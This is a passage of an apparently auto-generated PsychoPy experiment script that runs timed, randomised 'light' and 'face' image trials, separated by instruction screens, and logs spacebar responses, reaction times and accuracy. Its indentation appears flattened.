tThisFlip = win.getFutureFlipTime(clock=introduction2Clock)
tThisFlipGlobal = win.getFutureFlipTime(clock=None)
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *introduction_2* updates
if introduction_2.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
introduction_2.frameNStart = frameN # exact frame index
introduction_2.tStart = t # local t and not account for scr refresh
introduction_2.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(introduction_2, 'tStartRefresh') # time at next scr refresh
introduction_2.setAutoDraw(True)
# *key_resp_2* updates
waitOnFlip = False
if key_resp_2.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
key_resp_2.frameNStart = frameN # exact frame index
key_resp_2.tStart = t # local t and not account for scr refresh
key_resp_2.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(key_resp_2, 'tStartRefresh') # time at next scr refresh
key_resp_2.status = STARTED
# keyboard checking is just starting
waitOnFlip = True
win.callOnFlip(key_resp_2.clock.reset) # t=0 on next screen flip
win.callOnFlip(key_resp_2.clearEvents, eventType='keyboard') # clear events on next screen flip
if key_resp_2.status == STARTED and not waitOnFlip:
theseKeys = key_resp_2.getKeys(keyList=['space'], waitRelease=False)
_key_resp_2_allKeys.extend(theseKeys)
if len(_key_resp_2_allKeys):
key_resp_2.keys = _key_resp_2_allKeys[-1].name # just the last key pressed
key_resp_2.rt = _key_resp_2_allKeys[-1].rt
# a response ends the routine
continueRoutine = False
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in introduction2Components:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "introduction2"-------
for thisComponent in introduction2Components:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.addData('introduction_2.started', introduction_2.tStartRefresh)
thisExp.addData('introduction_2.stopped', introduction_2.tStopRefresh)
# the Routine "introduction2" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
loop_light1 = data.TrialHandler(nReps=12, method='random',
extraInfo=expInfo, originPath=-1,
trialList=data.importConditions('documents\\light.xlsx'),
seed=None, name='loop_light1')
thisExp.addLoop(loop_light1) # add the loop to the experiment
thisLoop_light1 = loop_light1.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisLoop_light1.rgb)
if thisLoop_light1 != None:
for paramName in thisLoop_light1:
exec('{} = thisLoop_light1[paramName]'.format(paramName))
for thisLoop_light1 in loop_light1:
currentLoop = loop_light1
# abbreviate parameter names if possible (e.g. rgb = thisLoop_light1.rgb)
if thisLoop_light1 != None:
for paramName in thisLoop_light1:
exec('{} = thisLoop_light1[paramName]'.format(paramName))
# ------Prepare to start Routine "light"-------
continueRoutine = True
routineTimer.add(2.400000)
# update component parameters for each repeat
image.setImage(path1)
key_resp_light.keys = []
key_resp_light.rt = []
_key_resp_light_allKeys = []
# keep track of which components have finished
lightComponents = [concentration, image, key_resp_light]
for thisComponent in lightComponents:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
lightClock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "light"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = lightClock.getTime()
tThisFlip = win.getFutureFlipTime(clock=lightClock)
tThisFlipGlobal = win.getFutureFlipTime(clock=None)
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *concentration* updates
if concentration.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
concentration.frameNStart = frameN # exact frame index
concentration.tStart = t # local t and not account for scr refresh
concentration.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(concentration, 'tStartRefresh') # time at next scr refresh
concentration.setAutoDraw(True)
if concentration.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > concentration.tStartRefresh + 0.4-frameTolerance:
# keep track of stop time/frame for later
concentration.tStop = t # not accounting for scr refresh
concentration.frameNStop = frameN # exact frame index
win.timeOnFlip(concentration, 'tStopRefresh') # time at next scr refresh
concentration.setAutoDraw(False)
# *image* updates
if image.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
# keep track of start time/frame for later
image.frameNStart = frameN # exact frame index
image.tStart = t # local t and not account for scr refresh
image.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(image, 'tStartRefresh') # time at next scr refresh
image.setAutoDraw(True)
if image.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > image.tStartRefresh + 2-frameTolerance:
# keep track of stop time/frame for later
image.tStop = t # not accounting for scr refresh
image.frameNStop = frameN # exact frame index
win.timeOnFlip(image, 'tStopRefresh') # time at next scr refresh
image.setAutoDraw(False)
# *key_resp_light* updates
waitOnFlip = False
if key_resp_light.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
# keep track of start time/frame for later
key_resp_light.frameNStart = frameN # exact frame index
key_resp_light.tStart = t # local t and not account for scr refresh
key_resp_light.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(key_resp_light, 'tStartRefresh') # time at next scr refresh
key_resp_light.status = STARTED
# keyboard checking is just starting
waitOnFlip = True
win.callOnFlip(key_resp_light.clock.reset) # t=0 on next screen flip
win.callOnFlip(key_resp_light.clearEvents, eventType='keyboard') # clear events on next screen flip
if key_resp_light.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > key_resp_light.tStartRefresh + 2-frameTolerance:
# keep track of stop time/frame for later
key_resp_light.tStop = t # not accounting for scr refresh
key_resp_light.frameNStop = frameN # exact frame index
win.timeOnFlip(key_resp_light, 'tStopRefresh') # time at next scr refresh
key_resp_light.status = FINISHED
if key_resp_light.status == STARTED and not waitOnFlip:
theseKeys = key_resp_light.getKeys(keyList=['space'], waitRelease=False)
_key_resp_light_allKeys.extend(theseKeys)
if len(_key_resp_light_allKeys):
key_resp_light.keys = _key_resp_light_allKeys[-1].name # just the last key pressed
key_resp_light.rt = _key_resp_light_allKeys[-1].rt
# was this correct?
if (key_resp_light.keys == str(path1_corr)) or (key_resp_light.keys == path1_corr):
key_resp_light.corr = 1
else:
key_resp_light.corr = 0
# a response ends the routine
continueRoutine = False
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in lightComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "light"-------
for thisComponent in lightComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
loop_light1.addData('concentration.started', concentration.tStartRefresh)
loop_light1.addData('concentration.stopped', concentration.tStopRefresh)
loop_light1.addData('image.started', image.tStartRefresh)
loop_light1.addData('image.stopped', image.tStopRefresh)
# check responses
if key_resp_light.keys in ['', [], None]: # No response was made
key_resp_light.keys = None
# was no response the correct answer?!
if str(path1_corr).lower() == 'none':
key_resp_light.corr = 1; # correct non-response
else:
key_resp_light.corr = 0; # failed to respond (incorrectly)
# store data for loop_light1 (TrialHandler)
loop_light1.addData('key_resp_light.keys',key_resp_light.keys)
loop_light1.addData('key_resp_light.corr', key_resp_light.corr)
if key_resp_light.keys != None: # we had a response
loop_light1.addData('key_resp_light.rt', key_resp_light.rt)
loop_light1.addData('key_resp_light.started', key_resp_light.tStartRefresh)
loop_light1.addData('key_resp_light.stopped', key_resp_light.tStopRefresh)
thisExp.nextEntry()
# completed 12 repeats of 'loop_light1'
# ------Prepare to start Routine "introduction3"-------
continueRoutine = True
# update component parameters for each repeat
key_resp_3.keys = []
key_resp_3.rt = []
_key_resp_3_allKeys = []
# keep track of which components have finished
introduction3Components = [introduction_3, key_resp_3]
for thisComponent in introduction3Components:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
introduction3Clock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "introduction3"-------
while continueRoutine:
# get current time
t = introduction3Clock.getTime()
tThisFlip = win.getFutureFlipTime(clock=introduction3Clock)
tThisFlipGlobal = win.getFutureFlipTime(clock=None)
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *introduction_3* updates
if introduction_3.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
introduction_3.frameNStart = frameN # exact frame index
introduction_3.tStart = t # local t and not account for scr refresh
introduction_3.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(introduction_3, 'tStartRefresh') # time at next scr refresh
introduction_3.setAutoDraw(True)
# *key_resp_3* updates
waitOnFlip = False
if key_resp_3.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
key_resp_3.frameNStart = frameN # exact frame index
key_resp_3.tStart = t # local t and not account for scr refresh
key_resp_3.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(key_resp_3, 'tStartRefresh') # time at next scr refresh
key_resp_3.status = STARTED
# keyboard checking is just starting
waitOnFlip = True
win.callOnFlip(key_resp_3.clock.reset) # t=0 on next screen flip
win.callOnFlip(key_resp_3.clearEvents, eventType='keyboard') # clear events on next screen flip
if key_resp_3.status == STARTED and not waitOnFlip:
theseKeys = key_resp_3.getKeys(keyList=['space'], waitRelease=False)
_key_resp_3_allKeys.extend(theseKeys)
if len(_key_resp_3_allKeys):
key_resp_3.keys = _key_resp_3_allKeys[-1].name # just the last key pressed
key_resp_3.rt = _key_resp_3_allKeys[-1].rt
# a response ends the routine
continueRoutine = False
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in introduction3Components:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "introduction3"-------
for thisComponent in introduction3Components:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.addData('introduction_3.started', introduction_3.tStartRefresh)
thisExp.addData('introduction_3.stopped', introduction_3.tStopRefresh)
# the Routine "introduction3" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
loop_face1 = data.TrialHandler(nReps=2, method='random',
extraInfo=expInfo, originPath=-1,
trialList=data.importConditions('documents\\face.xlsx'),
seed=None, name='loop_face1')
thisExp.addLoop(loop_face1) # add the loop to the experiment
thisLoop_face1 = loop_face1.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisLoop_face1.rgb)
if thisLoop_face1 != None:
for paramName in thisLoop_face1:
exec('{} = thisLoop_face1[paramName]'.format(paramName))
for thisLoop_face1 in loop_face1:
currentLoop = loop_face1
# abbreviate parameter names if possible (e.g. rgb = thisLoop_face1.rgb)
if thisLoop_face1 != None:
for paramName in thisLoop_face1:
exec('{} = thisLoop_face1[paramName]'.format(paramName))
# ------Prepare to start Routine "face"-------
continueRoutine = True
routineTimer.add(2.400000)
# update component parameters for each repeat
image_2.setImage(path2)
key_resp_face.keys = []
key_resp_face.rt = []
_key_resp_face_allKeys = []
# keep track of which components have finished
faceComponents = [concentration2, image_2, key_resp_face]
for thisComponent in faceComponents:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
faceClock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "face"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = faceClock.getTime()
tThisFlip = win.getFutureFlipTime(clock=faceClock)
tThisFlipGlobal = win.getFutureFlipTime(clock=None)
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *concentration2* updates
if concentration2.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
concentration2.frameNStart = frameN # exact frame index
concentration2.tStart = t # local t and not account for scr refresh
concentration2.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(concentration2, 'tStartRefresh') # time at next scr refresh
concentration2.setAutoDraw(True)
if concentration2.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > concentration2.tStartRefresh + 0.4-frameTolerance:
# keep track of stop time/frame for later
concentration2.tStop = t # not accounting for scr refresh
concentration2.frameNStop = frameN # exact frame index
win.timeOnFlip(concentration2, 'tStopRefresh') # time at next scr refresh
concentration2.setAutoDraw(False)
# *image_2* updates
if image_2.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
# keep track of start time/frame for later
image_2.frameNStart = frameN # exact frame index
image_2.tStart = t # local t and not account for scr refresh
image_2.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(image_2, 'tStartRefresh') # time at next scr refresh
image_2.setAutoDraw(True)
if image_2.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > image_2.tStartRefresh + 2-frameTolerance:
# keep track of stop time/frame for later
image_2.tStop = t # not accounting for scr refresh
image_2.frameNStop = frameN # exact frame index
win.timeOnFlip(image_2, 'tStopRefresh') # time at next scr refresh
image_2.setAutoDraw(False)
# *key_resp_face* updates
waitOnFlip = False
if key_resp_face.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
# keep track of start time/frame for later
key_resp_face.frameNStart = frameN # exact frame index
key_resp_face.tStart = t # local t and not account for scr refresh
key_resp_face.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(key_resp_face, 'tStartRefresh') # time at next scr refresh
key_resp_face.status = STARTED
# keyboard checking is just starting
waitOnFlip = True
win.callOnFlip(key_resp_face.clock.reset) # t=0 on next screen flip
win.callOnFlip(key_resp_face.clearEvents, eventType='keyboard') # clear events on next screen flip
if key_resp_face.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > key_resp_face.tStartRefresh + 2-frameTolerance:
# keep track of stop time/frame for later
key_resp_face.tStop = t # not accounting for scr refresh
key_resp_face.frameNStop = frameN # exact frame index
win.timeOnFlip(key_resp_face, 'tStopRefresh') # time at next scr refresh
key_resp_face.status = FINISHED
if key_resp_face.status == STARTED and not waitOnFlip:
theseKeys = key_resp_face.getKeys(keyList=['space'], waitRelease=False)
_key_resp_face_allKeys.extend(theseKeys)
if len(_key_resp_face_allKeys):
key_resp_face.keys = _key_resp_face_allKeys[-1].name # just the last key pressed
key_resp_face.rt = _key_resp_face_allKeys[-1].rt
# was this correct?
if (key_resp_face.keys == str(path2_corr)) or (key_resp_face.keys == path2_corr):
key_resp_face.corr = 1
else:
key_resp_face.corr = 0
# a response ends the routine
continueRoutine = False
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in faceComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "face"-------
for thisComponent in faceComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
loop_face1.addData('concentration2.started', concentration2.tStartRefresh)
loop_face1.addData('concentration2.stopped', concentration2.tStopRefresh)
loop_face1.addData('image_2.started', image_2.tStartRefresh)
loop_face1.addData('image_2.stopped', image_2.tStopRefresh)
# check responses
if key_resp_face.keys in ['', [], None]: # No response was made
key_resp_face.keys = None
# was no response the correct answer?!
if str(path2_corr).lower() == 'none':
key_resp_face.corr = 1; # correct non-response
else:
key_resp_face.corr = 0; # failed to respond (incorrectly)
# store data for loop_face1 (TrialHandler)
loop_face1.addData('key_resp_face.keys',key_resp_face.keys)
loop_face1.addData('key_resp_face.corr', key_resp_face.corr)
if key_resp_face.keys != None: # we had a response
loop_face1.addData('key_resp_face.rt', key_resp_face.rt)
loop_face1.addData('key_resp_face.started', key_resp_face.tStartRefresh)
loop_face1.addData('key_resp_face.stopped', key_resp_face.tStopRefresh)
thisExp.nextEntry()
# completed 2 repeats of 'loop_face1'
# ------Prepare to start Routine "tip1"-------
continueRoutine = True
# update component parameters for each repeat
key_resp_5.keys = []
key_resp_5.rt = []
_key_resp_5_allKeys = []
# keep track of which components have finished
tip1Components = [tip_1, key_resp_5]
for thisComponent in tip1Components:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
tip1Clock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "tip1"-------
while continueRoutine:
# get current time
t = tip1Clock.getTime()
tThisFlip = win.getFutureFlipTime(clock=tip1Clock)
tThisFlipGlobal = win.getFutureFlipTime(clock=None)
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *tip_1* updates
if tip_1.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
tip_1.frameNStart = frameN # exact frame index
tip_1.tStart = t # local t and not account for scr refresh
tip_1.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(tip_1, 'tStartRefresh') # time at next scr refresh
tip_1.setAutoDraw(True)
# *key_resp_5* updates
waitOnFlip = False
if key_resp_5.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
key_resp_5.frameNStart = frameN # exact frame index
key_resp_5.tStart = t # local t and not account for scr refresh
key_resp_5.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(key_resp_5, 'tStartRefresh') # time at next scr refresh
key_resp_5.status = STARTED
# keyboard checking is just starting
waitOnFlip = True
win.callOnFlip(key_resp_5.clock.reset) # t=0 on next screen flip
win.callOnFlip(key_resp_5.clearEvents, eventType='keyboard') # clear events on next screen flip
if key_resp_5.status == STARTED and not waitOnFlip:
theseKeys = key_resp_5.getKeys(keyList=['space'], waitRelease=False)
_key_resp_5_allKeys.extend(theseKeys)
if len(_key_resp_5_allKeys):
key_resp_5.keys = _key_resp_5_allKeys[-1].name # just the last key pressed
key_resp_5.rt = _key_resp_5_allKeys[-1].rt
# a response ends the routine
continueRoutine = False
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in tip1Components:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "tip1"-------
for thisComponent in tip1Components:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.addData('tip_1.started', tip_1.tStartRefresh)
thisExp.addData('tip_1.stopped', tip_1.tStopRefresh)
# the Routine "tip1" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
loop_light2 = data.TrialHandler(nReps=12, method='random',
extraInfo=expInfo, originPath=-1,
trialList=data.importConditions('documents\\light.xlsx'),
seed=None, name='loop_light2')
thisExp.addLoop(loop_light2) # add the loop to the experiment
thisLoop_light2 = loop_light2.trialList[0] # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisLoop_light2.rgb)
if thisLoop_light2 != None:
for paramName in thisLoop_light2:
exec('{} = thisLoop_light2[paramName]'.format(paramName))
for thisLoop_light2 in loop_light2:
currentLoop = loop_light2
# abbreviate parameter names if possible (e.g. rgb = thisLoop_light2.rgb)
if thisLoop_light2 != None:
for paramName in thisLoop_light2:
exec('{} = thisLoop_light2[paramName]'.format(paramName))
# ------Prepare to start Routine "light"-------
continueRoutine = True
routineTimer.add(2.400000)
# update component parameters for each repeat
image.setImage(path1)
key_resp_light.keys = []
key_resp_light.rt = []
_key_resp_light_allKeys = []
# keep track of which components have finished
lightComponents = [concentration, image, key_resp_light]
for thisComponent in lightComponents:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
lightClock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "light"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = lightClock.getTime()
tThisFlip = win.getFutureFlipTime(clock=lightClock)
tThisFlipGlobal = win.getFutureFlipTime(clock=None)
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *concentration* updates
if concentration.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
concentration.frameNStart = frameN # exact frame index
concentration.tStart = t # local t and not account for scr refresh
concentration.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(concentration, 'tStartRefresh') # time at next scr refresh
concentration.setAutoDraw(True)
if concentration.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > concentration.tStartRefresh + 0.4-frameTolerance:
# keep track of stop time/frame for later
concentration.tStop = t # not accounting for scr refresh
concentration.frameNStop = frameN # exact frame index
win.timeOnFlip(concentration, 'tStopRefresh') # time at next scr refresh
concentration.setAutoDraw(False)
# *image* updates
if image.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
# keep track of start time/frame for later
image.frameNStart = frameN # exact frame index
image.tStart = t # local t and not account for scr refresh
image.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(image, 'tStartRefresh') # time at next scr refresh
image.setAutoDraw(True)
if image.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > image.tStartRefresh + 2-frameTolerance:
# keep track of stop time/frame for later
image.tStop = t # not accounting for scr refresh
image.frameNStop = frameN # exact frame index
win.timeOnFlip(image, 'tStopRefresh') # time at next scr refresh
image.setAutoDraw(False)
# *key_resp_light* updates
waitOnFlip = False
if key_resp_light.status == NOT_STARTED and tThisFlip >= 0.4-frameTolerance:
# keep track of start time/frame for later
key_resp_light.frameNStart = frameN # exact frame index
key_resp_light.tStart = t # local t and not account for scr refresh
key_resp_light.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(key_resp_light, 'tStartRefresh') # time at next scr refresh
key_resp_light.status = STARTED
# keyboard checking is just starting
waitOnFlip = True
win.callOnFlip(key_resp_light.clock.reset) # t=0 on next screen flip
win.callOnFlip(key_resp_light.clearEvents, eventType='keyboard') # clear events on next screen flip
if key_resp_light.status == STARTED:
# is it time to stop? (based on global clock, using actual start)
if tThisFlipGlobal > key_resp_light.tStartRefresh + 2-frameTolerance:
# keep track of stop time/frame for later
key_resp_light.tStop = t # not accounting for scr refresh
key_resp_light.frameNStop = frameN # exact frame index
win.timeOnFlip(key_resp_light, 'tStopRefresh') # time at next scr refresh
key_resp_light.status = FINISHED
if key_resp_light.status == STARTED and not waitOnFlip:
theseKeys = key_resp_light.getKeys(keyList=['space'], waitRelease=False)
_key_resp_light_allKeys.extend(theseKeys)
if len(_key_resp_light_allKeys):
key_resp_light.keys = _key_resp_light_allKeys[-1].name # just the last key pressed
key_resp_light.rt = _key_resp_light_allKeys[-1].rt
# was this correct?
if (key_resp_light.keys == str(path1_corr)) or (key_resp_light.keys == path1_corr):
key_resp_light.corr = 1
else:
key_resp_light.corr = 0
# a response ends the routine
continueRoutine = False
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in lightComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "light"-------
for thisComponent in lightComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
loop_light2.addData('concentration.started', concentration.tStartRefresh)
loop_light2.addData('concentration.stopped', concentration.tStopRefresh)
loop_light2.addData('image.started', image.tStartRefresh)
loop_light2.addData('image.stopped', image.tStopRefresh)
# check responses
if key_resp_light.keys in ['', [], None]: # No response was made
key_resp_light.keys = None
# was no response the correct answer?!
if str(path1_corr).lower() == 'none':
key_resp_light.corr = 1; # correct non-response
else:
key_resp_light.corr = 0; # failed to respond (incorrectly)
# store data for loop_light2 (TrialHandler)
loop_light2.addData('key_resp_light.keys',key_resp_light.keys)
loop_light2.addData('key_resp_light.corr', key_resp_light.corr)
if key_resp_light.keys != None: # we had a response
loop_light2.addData('key_resp_light.rt', key_resp_light.rt)
loop_light2.addData('key_resp_light.started', key_resp_light.tStartRefresh)
loop_light2.addData('key_resp_light.stopped', key_resp_light.tStopRefresh)
thisExp.nextEntry()
# completed 12 repeats of 'loop_light2'
# ------Prepare to start Routine "tip2"-------
continueRoutine = True
# update component parameters for each repeat
key_resp_7.keys = []
key_resp_7.rt = []
_key_resp_7_allKeys = []
# keep track of which components have finished
tip2Components = [tip_2, key_resp_7]
for thisComponent in tip2Components:
thisComponent.tStart = None
thisComponent.tStop = None
thisComponent.tStartRefresh = None
thisComponent.tStopRefresh = None
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# reset timers
t = 0
_timeToFirstFrame = win.getFutureFlipTime(clock="now")
tip2Clock.reset(-_timeToFirstFrame) # t0 is time of first possible flip
frameN = -1
# -------Run Routine "tip2"-------
while continueRoutine:
# get current time
t = tip2Clock.getTime()
tThisFlip = win.getFutureFlipTime(clock=tip2Clock)
tThisFlipGlobal = win.getFutureFlipTime(clock=None)
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *tip_2* updates
if tip_2.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
tip_2.frameNStart = frameN # exact frame index
tip_2.tStart = t # local t and not account for scr refresh
tip_2.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(tip_2, 'tStartRefresh') # time at next scr refresh
tip_2.setAutoDraw(True)
# *key_resp_7* updates
waitOnFlip = False
if key_resp_7.status == NOT_STARTED and tThisFlip >= 0.0-frameTolerance:
# keep track of start time/frame for later
key_resp_7.frameNStart = frameN # exact frame index
key_resp_7.tStart = t # local t and not account for scr refresh
key_resp_7.tStartRefresh = tThisFlipGlobal # on global time
win.timeOnFlip(key_resp_7, 'tStartRefresh') # time at next scr refresh
key_resp_7.status = STARTED
# keyboard checking is just starting
waitOnFlip = True
win.callOnFlip(key_resp_7.clock.reset) # t=0 on next screen flip
win.callOnFlip(key_resp_7.clearEvents, eventType='keyboard') # clear events on next screen flip
if key_resp_7.status == STARTED and not waitOnFlip:
theseKeys = key_resp_7.getKeys(keyList=['space'], waitRelease=False)
_key_resp_7_allKeys.extend(theseKeys)
if len(_key_resp_7_allKeys):
key_resp_7.keys = _key_resp_7_allKeys[-1].name # just the last key pressed
key_resp_7.rt = _key_resp_7_allKeys[-1].rt
# a response ends the routine
continueRoutine = False
# check for quit (typically the Esc key)
if endExpNow or defaultKeyboard.getKeys(keyList=["escape"]):
core.quit()
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in tip2Components:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "tip2"-------
for thisComponent in tip2Components:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.addData('tip_2.started', tip_2.tStartRefresh)
thisExp.addData('tip_2.stopped', tip_2.tStopRefresh)
# the Routine "tip2" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# set up handler to look after randomisation of conditions etc
loop_face2 = data.TrialHandler(nReps=2, method='random',
extraInfo=expInfo, originPath=-1,
trialList=data.importConditions('documents\\face.xlsx'),
seed=None, name='loop_face2')
thisExp.addLoop(loop_face2) # add the loop to the experiment
